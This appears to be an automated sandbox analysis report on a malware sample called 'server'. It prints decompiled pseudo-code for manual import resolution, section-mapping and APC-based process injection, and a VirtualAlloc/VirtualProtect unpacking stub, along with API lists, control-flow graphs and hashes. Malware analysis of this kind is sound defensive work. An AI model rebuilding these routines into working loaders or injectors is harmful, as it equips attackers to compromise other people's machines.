                    0x00401a12
                    0x00401a18
                    0x00401a1c
                    0x00401a53
                    0x00401a1e
                    0x00401a26
                    0x00401a2c
                    0x00401a2e
                    0x00401a33
                    0x00401a39
                    0x00401a3b
                    0x00401a3b
                    0x00401a42
                    0x00401a48
                    0x00401a48
                    0x00401a4c
                    0x00401a4c
                    0x00401a5a
                    0x00401a61
                    0x00401a6a
                    0x00401a6d
                    0x00401a73
                    0x00401a76
                    0x00401a7f
                    0x00401ba4
                    0x00000000
                    0x00401ba6
                    0x00401a92
                    0x00401a95
                    0x00401a9d
                    0x00401a9f
                    0x00401aaa
                    0x00401ab2
                    0x00401ab2
                    0x00401ac0
                    0x00401b96
                    0x00401b96
                    0x00401b9c
                    0x00401b9e
                    0x00401b9e
                    0x00000000
                    0x00401ac6
                    0x00401ad1
                    0x00401b0f
                    0x00401b15
                    0x00401b27
                    0x00401b2d
                    0x00401b31
                    0x00401b8d
                    0x00401b93
                    0x00000000
                    0x00401b93
                    0x00401b3d
                    0x00401b4b
                    0x00401b53
                    0x00401b57
                    0x00401b5e
                    0x00401b61
                    0x00401b63
                    0x00401b63
                    0x00401b6b
                    0x00000000
                    0x00401b6d
                    0x00401b70
                    0x00401b76
                    0x00401b7b
                    0x00401b82
                    0x00401b82
                    0x00401b89
                    0x00000000
                    0x00401b89
                    0x00401b6b
                    0x00401ad3
                    0x00401ad8
                    0x00401adf
                    0x00401ae1
                    0x00401ae5
                    0x00401b07
                    0x00401b07
                    0x00000000
                    0x00401b07
                    0x00401ae7
                    0x00401aec
                    0x00401af1
                    0x00401af8
                    0x00000000
                    0x00000000
                    0x00401afd
                    0x00401b00
                    0x00000000
                    0x00401b00

                    APIs
                      • Part of subcall function 00401D68: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
                      • Part of subcall function 00401D68: GetVersion.KERNEL32 ref: 00401D86
                      • Part of subcall function 00401D68: GetCurrentProcessId.KERNEL32 ref: 00401DA2
                      • Part of subcall function 00401D68: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
                      • Part of subcall function 004012E6: RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
                    • NtQuerySystemInformation.NTDLL ref: 00401A26
                    • Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 00401A6D
                    • GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
                    • GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
                    • VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
                    • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401ADF
                    • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401AFD
                    • CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000), ref: 00401B27
                    • QueueUserAPC.KERNELBASE(0040139F,00000000,?,?,00000000), ref: 00401B3D
                    • GetLastError.KERNEL32(?,00000000), ref: 00401B4D
                    • TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B57
                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B5E
                    • SetLastError.KERNEL32(00000000,?,00000000), ref: 00401B63
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00401B70
                    • GetExitCodeThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B82
                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B89
                    • GetLastError.KERNEL32(?,00000000), ref: 00401B8D
                    • GetLastError.KERNEL32(?,00000000), ref: 00401B9E
                    Memory Dump Source
                    • Source File: 00000000.00000002.580373097.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.580373097.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.580373097.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.580373097.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_server.jbxd
                    Similarity
                    • API ID: ErrorLast$NameThread$CloseCreateHandleLanguageLongPathProcessSystem$AllocateCodeCurrentDefaultEventExitHeapInfoInformationLocaleObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
                    • String ID:
                    • API String ID: 3475612337-0
                    • Opcode ID: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
                    • Instruction ID: e4abbca9115d716754b6864e37b0832fe911a2439c52af45cdd796d0275508de
                    • Opcode Fuzzy Hash: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
                    • Instruction Fuzzy Hash: 4E519E71901214ABE721AFA59D48EAFBA7CAB45755F104177F901F32A0EB389A40CB68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 132 4015b0-401607 GetSystemTimeAsFileTime 135 401609 132->135 136 40160e-401627 CreateFileMappingW 132->136 135->136 137 401671-401677 GetLastError 136->137 138 401629-401632 136->138 141 401679-40167f 137->141 139 401642-401650 MapViewOfFile 138->139 140 401634-40163b GetLastError 138->140 143 401660-401666 GetLastError 139->143 144 401652-40165e 139->144 140->139 142 40163d-401640 140->142 145 401668-40166f CloseHandle 142->145 143->141 143->145 144->141 145->141
                    C-Code - Quality: 69%
                    			E004015B0(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                    				intOrPtr _v12;
                    				struct _FILETIME* _v16;
                    				short _v60;
                    				struct _FILETIME* _t14;
                    				intOrPtr _t15;
                    				long _t18;
                    				void* _t19;
                    				void* _t22;
                    				intOrPtr _t31;
                    				long _t32;
                    				void* _t34;
                    
                    				_t31 = __edx;
                    				_t14 =  &_v16;
                    				GetSystemTimeAsFileTime(_t14);
                    				_push(0x192);
                    				_push(0x54d38000);
                    				_push(_v12);
                    				_push(_v16);
                    				L00402026();
                    				_push(_t14);
                    				_v16 = _t14;
                    				_t15 =  *0x404184;
                    				_push(_t15 + 0x4051ca);
                    				_push(_t15 + 0x4051c0);
                    				_push(0x16);
                    				_push( &_v60);
                    				_v12 = _t31;
                    				L00402020();
                    				_t18 = _a4;
                    				if(_t18 == 0) {
                    					_t18 = 0x1000;
                    				}
                    				_t19 = CreateFileMappingW(0xffffffff, 0x404188, 4, 0, _t18,  &_v60); // executed
                    				_t34 = _t19;
                    				if(_t34 == 0) {
                    					_t32 = GetLastError();
                    				} else {
                    					if(_a4 != 0 || GetLastError() == 0xb7) {
                    						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                    						if(_t22 == 0) {
                    							_t32 = GetLastError();
                    							if(_t32 != 0) {
                    								goto L9;
                    							}
                    						} else {
                    							 *_a8 = _t34;
                    							 *_a12 = _t22;
                    							_t32 = 0;
                    						}
                    					} else {
                    						_t32 = 2;
                    						L9:
                    						CloseHandle(_t34);
                    					}
                    				}
                    				return _t32;
                    			}














                    0x004015b0
                    0x004015b9
                    0x004015bd
                    0x004015c3
                    0x004015c8
                    0x004015cd
                    0x004015d0
                    0x004015d3
                    0x004015d8
                    0x004015d9
                    0x004015dc
                    0x004015e7
                    0x004015ee
                    0x004015f2
                    0x004015f4
                    0x004015f5
                    0x004015f8
                    0x004015fd
                    0x00401607
                    0x00401609
                    0x00401609
                    0x0040161d
                    0x00401623
                    0x00401627
                    0x00401677
                    0x00401629
                    0x00401632
                    0x00401648
                    0x00401650
                    0x00401662
                    0x00401666
                    0x00000000
                    0x00000000
                    0x00401652
                    0x00401655
                    0x0040165a
                    0x0040165c
                    0x0040165c
                    0x0040163d
                    0x0040163f
                    0x00401668
                    0x00401669
                    0x00401669
                    0x00401632
                    0x0040167f

                    APIs
                    • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,00401418,0000000A,?,?), ref: 004015BD
                    • CreateFileMappingW.KERNELBASE(000000FF,00404188,00000004,00000000,?,?), ref: 0040161D
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401634
                    • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00401648
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401660
                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A), ref: 00401669
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401671
                    Memory Dump Source
                    • Source File: 00000000.00000002.580373097.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.580373097.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.580373097.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.580373097.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_server.jbxd
                    Similarity
                    • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView
                    • String ID:
                    • API String ID: 3812556954-0
                    • Opcode ID: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
                    • Instruction ID: e8584db34bd0864965919452e9e7a980232bfbaa31af8ac4f809374209f4ae08
                    • Opcode Fuzzy Hash: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
                    • Instruction Fuzzy Hash: 1421C8B2500208BFD7119FA4DC84EAF3BACEB44355F14443AFA05F72E0D6758D458B68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 255 40110b-40116d NtCreateSection 256 4011a4-4011a8 255->256 257 40116f-401178 call 401459 255->257 263 4011aa-4011b0 256->263 259 40117d-401181 257->259 261 401183-40119a memset 259->261 262 40119c-4011a2 259->262 261->263 262->263
                    C-Code - Quality: 72%
                    			E0040110B(intOrPtr* __eax, void** _a4) {
                    				int _v12;
                    				void* _v16;
                    				void* _v20;
                    				void* _v24;
                    				int _v28;
                    				int _v32;
                    				intOrPtr _v36;
                    				int _v40;
                    				int _v44;
                    				void* _v48;
                    				void* __esi;
                    				long _t34;
                    				void* _t39;
                    				void* _t47;
                    				intOrPtr* _t48;
                    
                    				_t48 = __eax;
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				_v24 =  *((intOrPtr*)(__eax + 4));
                    				_v16 = 0;
                    				_v12 = 0;
                    				_v48 = 0x18;
                    				_v44 = 0;
                    				_v36 = 0x40;
                    				_v40 = 0;
                    				_v32 = 0;
                    				_v28 = 0;
                    				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                    				if(_t34 < 0) {
                    					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                    				} else {
                    					 *_t48 = _v16;
                    					_t39 = E00401459(_t48,  &_v12); // executed
                    					_t47 = _t39;
                    					if(_t47 != 0) {
                    						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                    					} else {
                    						memset(_v12, 0, _v24);
                    						 *_a4 = _v12;
                    					}
                    				}
                    				return _t47;
                    			}


















                    0x00401114
                    0x0040111b
                    0x0040111c
                    0x0040111d
                    0x0040111e
                    0x0040111f
                    0x00401130
                    0x00401134
                    0x00401148
                    0x0040114b
                    0x0040114e
                    0x00401155
                    0x00401158
                    0x0040115f
                    0x00401162
                    0x00401165
                    0x00401168
                    0x0040116d
                    0x004011a8
                    0x0040116f
                    0x00401172
                    0x00401178
                    0x0040117d
                    0x00401181
                    0x0040119f
                    0x00401183
                    0x0040118a
                    0x00401198
                    0x00401198
                    0x00401181
                    0x004011b0

                    APIs
                    • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76684EE0,00000000,00000000,?), ref: 00401168
                      • Part of subcall function 00401459: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486
                    • memset.NTDLL ref: 0040118A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.580373097.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.580373097.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.580373097.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.580373097.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_server.jbxd
                    Similarity
                    • API ID: Section$CreateViewmemset
                    • String ID: @
                    • API String ID: 2533685722-2766056989
                    • Opcode ID: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
                    • Instruction ID: 902b655066e6f1ef2c1749b59dddf7677aeeae3e3ffa194d207bc0e2506ab0da
                    • Opcode Fuzzy Hash: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
                    • Instruction Fuzzy Hash: 38214DB1D00209AFDB10DFA9C8809EEFBB9FF48314F10453AE616F7250D734AA048B64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 278 401000-40101d 279 401103-401108 278->279 280 401023-40102d 278->280 280->279 281 401033 280->281 282 401034-401043 LoadLibraryA 281->282 283 4010f9-4010ff 282->283 284 401049-40105f 282->284 287 401102 283->287 285 401061-401065 284->285 286 401067-40106f 284->286 285->286 288 4010e5-4010f1 285->288 289 4010d4-4010d8 286->289 287->279 288->282 292 4010f7 288->292 290 401071 289->290 291 4010da 289->291 293 401073-401075 290->293 294 401077-401079 290->294 291->288 292->287 295 401087-40108a 293->295 296 40107b-401085 294->296 297 40108c-401093 294->297 298 401096-40109b 295->298 296->295 296->297 297->298 299 4010a2 298->299 300 40109d-4010a0 298->300 301 4010a6-4010b2 GetProcAddress 299->301 300->301 302 4010b4-4010b9 301->302 303 4010dc-4010e2 301->303 304 4010c3-4010d1 302->304 305 4010bb-4010c1 302->305 303->288 304->289 305->304
                    C-Code - Quality: 100%
                    			E00401000(void* __edi, intOrPtr _a4) {
                    				signed int _v8;
                    				intOrPtr* _v12;
                    				_Unknown_base(*)()** _v16;
                    				signed int _v20;
                    				signed short _v24;
                    				struct HINSTANCE__* _v28;
                    				intOrPtr _t43;
                    				intOrPtr* _t45;
                    				intOrPtr _t46;
                    				struct HINSTANCE__* _t47;
                    				intOrPtr* _t49;
                    				intOrPtr _t50;
                    				signed short _t51;
                    				_Unknown_base(*)()* _t53;
                    				CHAR* _t54;
                    				_Unknown_base(*)()* _t55;
                    				void* _t58;
                    				signed int _t59;
                    				_Unknown_base(*)()* _t60;
                    				intOrPtr _t61;
                    				intOrPtr _t65;
                    				signed int _t68;
                    				void* _t69;
                    				CHAR* _t71;
                    				signed short* _t73;
                    
                    				_t69 = __edi;
                    				_v20 = _v20 & 0x00000000;
                    				_t59 =  *0x404180;
                    				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x18bad598));
                    				if(_t43 != 0) {
                    					_t45 = _t43 + __edi;
                    					_v12 = _t45;
                    					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                    					if(_t46 != 0) {
                    						while(1) {
                    							_t71 = _t46 + _t69;
                    							_t47 = LoadLibraryA(_t71); // executed
                    							_v28 = _t47;
                    							if(_t47 == 0) {
                    								break;
                    							}
                    							_v24 = _v24 & 0x00000000;
                    							 *_t71 = _t59 - 0x43175ac3;
                    							_t49 = _v12;
                    							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                    							_t50 =  *_t49;
                    							if(_t50 != 0) {
                    								L6:
                    								_t73 = _t50 + _t69;
                    								_v16 = _t61 + _t69;
                    								while(1) {
                    									_t51 =  *_t73;
                    									if(_t51 == 0) {
                    										break;
                    									}
                    									if(__eflags < 0) {
                    										__eflags = _t51 - _t69;
                    										if(_t51 < _t69) {
                    											L12:
                    											_t21 =  &_v8;
                    											 *_t21 = _v8 & 0x00000000;
                    											__eflags =  *_t21;
                    											_v24 =  *_t73 & 0x0000ffff;
                    										} else {
                    											_t65 = _a4;
                    											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                    											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                    												goto L12;
                    											} else {
                    												goto L11;
                    											}
                    										}
                    									} else {
                    										_t51 = _t51 + _t69;
                    										L11:
                    										_v8 = _t51;
                    									}
                    									_t53 = _v8;
                    									__eflags = _t53;
                    									if(_t53 == 0) {
                    										_t54 = _v24 & 0x0000ffff;
                    									} else {
                    										_t54 = _t53 + 2;
                    									}
                    									_t55 = GetProcAddress(_v28, _t54);
                    									__eflags = _t55;
                    									if(__eflags == 0) {
                    										_v20 = _t59 - 0x43175a44;
                    									} else {
                    										_t68 = _v8;
                    										__eflags = _t68;
                    										if(_t68 != 0) {
                    											 *_t68 = _t59 - 0x43175ac3;
                    										}
                    										 *_v16 = _t55;
                    										_t58 = _t59 * 4 - 0xc5d6b08;
                    										_t73 = _t73 + _t58;
                    										_t32 =  &_v16;
                    										 *_t32 = _v16 + _t58;
                    										__eflags =  *_t32;
                    										continue;
                    									}
                    									goto L23;
                    								}
                    							} else {
                    								_t50 = _t61;
                    								if(_t61 != 0) {
                    									goto L6;
                    								}
                    							}
                    							L23:
                    							_v12 = _v12 + 0x14;
                    							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                    							if(_t46 != 0) {
                    								continue;
                    							} else {
                    							}
                    							L26:
                    							goto L27;
                    						}
                    						_t60 = _t59 + 0xbce8a5bb;
                    						__eflags = _t60;
                    						_v20 = _t60;
                    						goto L26;
                    					}
                    				}
                    				L27:
                    				return _v20;
                    			}




























                    0x00401000
                    0x00401009
                    0x0040100e
                    0x00401014
                    0x0040101d
                    0x00401023
                    0x00401025
                    0x00401028
                    0x0040102d
                    0x00401034
                    0x00401034
                    0x00401038
                    0x0040103e
                    0x00401043
                    0x00000000
                    0x00000000
                    0x00401049
                    0x00401053
                    0x00401055
                    0x00401058
                    0x0040105b
                    0x0040105f
                    0x00401067
                    0x00401069
                    0x0040106c
                    0x004010d4
                    0x004010d4
                    0x004010d8
                    0x00000000
                    0x00000000
                    0x00401071
                    0x00401077
                    0x00401079
                    0x0040108c
                    0x0040108f
                    0x0040108f
                    0x0040108f
                    0x00401093
                    0x0040107b
                    0x0040107b
                    0x00401083
                    0x00401085
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00401085
                    0x00401073
                    0x00401073
                    0x00401087
                    0x00401087
                    0x00401087
                    0x00401096
                    0x00401099
                    0x0040109b
                    0x004010a2
                    0x0040109d
                    0x0040109d
                    0x0040109d
                    0x004010aa
                    0x004010b0
                    0x004010b2
                    0x004010e2
                    0x004010b4
                    0x004010b4
                    0x004010b7
                    0x004010b9
                    0x004010c1
                    0x004010c1
                    0x004010c6
                    0x004010c8
                    0x004010cf
                    0x004010d1
                    0x004010d1
                    0x004010d1
                    0x00000000
                    0x004010d1
                    0x00000000
                    0x004010b2
                    0x00401061
                    0x00401061
                    0x00401065
                    0x00000000
                    0x00000000
                    0x00401065
                    0x004010e5
                    0x004010e5
                    0x004010ec
                    0x004010f1
                    0x00000000
                    0x00000000
                    0x004010f7
                    0x00401102
                    0x00000000
                    0x00401102
                    0x004010f9
                    0x004010f9
                    0x004010ff
                    0x00000000
                    0x004010ff
                    0x0040102d
                    0x00401103
                    0x00401108

                    APIs
                    • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401038
                    • GetProcAddress.KERNEL32(?,00000000), ref: 004010AA
                    Memory Dump Source
                    • Source File: 00000000.00000002.580373097.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.580373097.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.580373097.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.580373097.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_server.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID:
                    • API String ID: 2574300362-0
                    • Opcode ID: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
                    • Instruction ID: 069ebb05316bb06cd12a0d66d81b5033da0b120a8bf666a49d589dbfec54084e
                    • Opcode Fuzzy Hash: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
                    • Instruction Fuzzy Hash: 65314975E0020ADFDB14CF59C980AAAB7F4BF04301B24407AD981FB7A0E779DA81CB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 330 401459-40148b NtMapViewOfSection 331 401491 330->331 332 40148d-40148f 330->332 333 401495-401498 331->333 332->333
                    C-Code - Quality: 68%
                    			E00401459(void** __esi, PVOID* _a4) {
                    				long _v8;
                    				void* _v12;
                    				void* _v16;
                    				long _t13;
                    
                    				_v16 = 0;
                    				asm("stosd");
                    				_v8 = 0;
                    				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                    				if(_t13 < 0) {
                    					_push(_t13);
                    					return __esi[6]();
                    				}
                    				return 0;
                    			}







                    0x0040146b
                    0x00401471
                    0x0040147f
                    0x00401486
                    0x0040148b
                    0x00401491
                    0x00000000
                    0x00401492
                    0x00000000

                    APIs
                    • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486
                    Memory Dump Source
                    • Source File: 00000000.00000002.580373097.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.580373097.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.580373097.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.580373097.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_server.jbxd
                    Similarity
                    • API ID: SectionView
                    • String ID:
                    • API String ID: 1323581903-0
                    • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                    • Instruction ID: 2ffffb3a0e1fef12aabb3d262299a14fd526f72662b70b4f27343324966f1358
                    • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                    • Instruction Fuzzy Hash: E9F037B590020CFFDB11DFA5CC85CAFBBBDEB44354B10493AF552E50A0D6309E089B60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 46 54003c-540047 47 54004c-540263 call 540a3f call 540e0f call 540d90 VirtualAlloc 46->47 48 540049 46->48 64 540265-540289 call 540a69 47->64 65 54028b-540292 47->65 48->47 69 5402ce-5403c2 VirtualProtect call 540cce call 540ce7 64->69 67 5402a1-5402b0 65->67 68 5402b2-5402cc 67->68 67->69 68->69 71 540294-54029b 68->71 76 5403d1-5403e0 69->76 71->67 77 5403e2-540437 call 540ce7 76->77 78 540439-5404b8 VirtualFree 76->78 77->76 80 5405f4-5405fe 78->80 81 5404be-5404cd 78->81 82 540604-54060d 80->82 83 54077f-540789 80->83 85 5404d3-5404dd 81->85 82->83 88 540613-540637 82->88 86 5407a6-5407b0 83->86 87 54078b-5407a3 83->87 85->80 90 5404e3-540505 85->90 91 5407b6-5407cb 86->91 92 54086e-5408be LoadLibraryA 86->92 87->86 93 54063e-540648 88->93 98 540517-540520 90->98 99 540507-540515 90->99 95 5407d2-5407d5 91->95 97 5408c7-5408f9 92->97 93->83 96 54064e-54065a 93->96 100 540824-540833 95->100 101 5407d7-5407e0 95->101 96->83 102 540660-54066a 96->102 103 540902-54091d 97->103 104 5408fb-540901 97->104 105 540526-540547 98->105 99->105 109 540839-54083c 100->109 106 5407e4-540822 101->106 107 5407e2 101->107 108 54067a-540689 102->108 104->103 110 54054d-540550 105->110 106->95 107->100 111 540750-54077a 108->111 112 54068f-5406b2 108->112 109->92 113 54083e-540847 109->113 115 540556-54056b 110->115 116 5405e0-5405ef 110->116 111->93 117 5406b4-5406ed 112->117 118 5406ef-5406fc 112->118 119 540849 113->119 120 54084b-54086c 113->120 121 54056d 115->121 122 54056f-54057a 115->122 116->85 117->118 123 5406fe-540748 118->123 124 54074b 118->124 119->92 120->109 121->116 125 54057c-540599 122->125 126 54059b-5405bb 122->126 123->124 124->108 131 5405bd-5405db 125->131 126->131 131->110
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0054024D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.580453253.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_540000_server.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: cess$kernel32.dll
                    • API String ID: 4275171209-1230238691
                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction ID: 154a888089c45a34402e680f3c48991356cd843d6438e7c360382ace7e0c66c3
                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction Fuzzy Hash: F0526974A01229DFDB64CF58C984BA8BBB1BF09304F1480D9E54DAB291DB30AE95DF15
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 146 401202-401214 call 4012e6 149 4012d5 146->149 150 40121a-40124f GetModuleHandleA GetProcAddress 146->150 151 4012dc-4012e3 149->151 152 401251-401265 GetProcAddress 150->152 153 4012cd-4012d3 call 401ba9 150->153 152->153 155 401267-40127b GetProcAddress 152->155 153->151 155->153 157 40127d-401291 GetProcAddress 155->157 157->153 158 401293-4012a7 GetProcAddress 157->158 158->153 159 4012a9-4012ba call 40110b 158->159 161 4012bf-4012c4 159->161 161->153 162 4012c6-4012cb 161->162 162->151
                    C-Code - Quality: 100%
                    			E00401202(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                    				intOrPtr _v8;
                    				_Unknown_base(*)()* _t29;
                    				_Unknown_base(*)()* _t33;
                    				_Unknown_base(*)()* _t36;
                    				_Unknown_base(*)()* _t39;
                    				_Unknown_base(*)()* _t42;
                    				intOrPtr _t46;
                    				struct HINSTANCE__* _t50;
                    				intOrPtr _t56;
                    
                    				_t56 = E004012E6(0x20);
                    				if(_t56 == 0) {
                    					_v8 = 8;
                    				} else {
                    					_t50 = GetModuleHandleA( *0x404184 + 0x405099);
                    					_v8 = 0x7f;
                    					_t29 = GetProcAddress(_t50,  *0x404184 + 0x4051e9);
                    					 *(_t56 + 0xc) = _t29;
                    					if(_t29 == 0) {
                    						L8:
                    						E00401BA9(_t56);
                    					} else {
                    						_t33 = GetProcAddress(_t50,  *0x404184 + 0x4051d1);
                    						 *(_t56 + 0x10) = _t33;
                    						if(_t33 == 0) {
                    							goto L8;
                    						} else {
                    							_t36 = GetProcAddress(_t50,  *0x404184 + 0x4050cc);
                    							 *(_t56 + 0x14) = _t36;
                    							if(_t36 == 0) {
                    								goto L8;
                    							} else {
                    								_t39 = GetProcAddress(_t50,  *0x404184 + 0x4050ec);
                    								 *(_t56 + 0x18) = _t39;
                    								if(_t39 == 0) {
                    									goto L8;
                    								} else {
                    									_t42 = GetProcAddress(_t50,  *0x404184 + 0x405091);
                    									 *(_t56 + 0x1c) = _t42;
                    									if(_t42 == 0) {
                    										goto L8;
                    									} else {
                    										 *((intOrPtr*)(_t56 + 8)) = _a8;
                    										 *((intOrPtr*)(_t56 + 4)) = _a4;
                    										_t46 = E0040110B(_t56, _a12); // executed
                    										_v8 = _t46;
                    										if(_t46 != 0) {
                    											goto L8;
                    										} else {
                    											 *_a16 = _t56;
                    										}
                    									}
                    								}
                    							}
                    						}
                    					}
                    				}
                    				return _v8;
                    			}












                    0x00401210
                    0x00401214
                    0x004012d5
                    0x0040121a
                    0x00401232
                    0x00401241
                    0x00401248
                    0x0040124a
                    0x0040124f
                    0x004012cd
                    0x004012ce
                    0x00401251
                    0x0040125e
                    0x00401260
                    0x00401265
                    0x00000000
                    0x00401267
                    0x00401274
                    0x00401276
                    0x0040127b
                    0x00000000
                    0x0040127d
                    0x0040128a
                    0x0040128c
                    0x00401291
                    0x00000000
                    0x00401293
                    0x004012a0
                    0x004012a2
                    0x004012a7
                    0x00000000
                    0x004012a9
                    0x004012af
                    0x004012b5
                    0x004012ba
                    0x004012bf
                    0x004012c4
                    0x00000000
                    0x004012c6
                    0x004012c9
                    0x004012c9
                    0x004012c4
                    0x004012a7
                    0x00401291
                    0x0040127b
                    0x00401265
                    0x0040124f
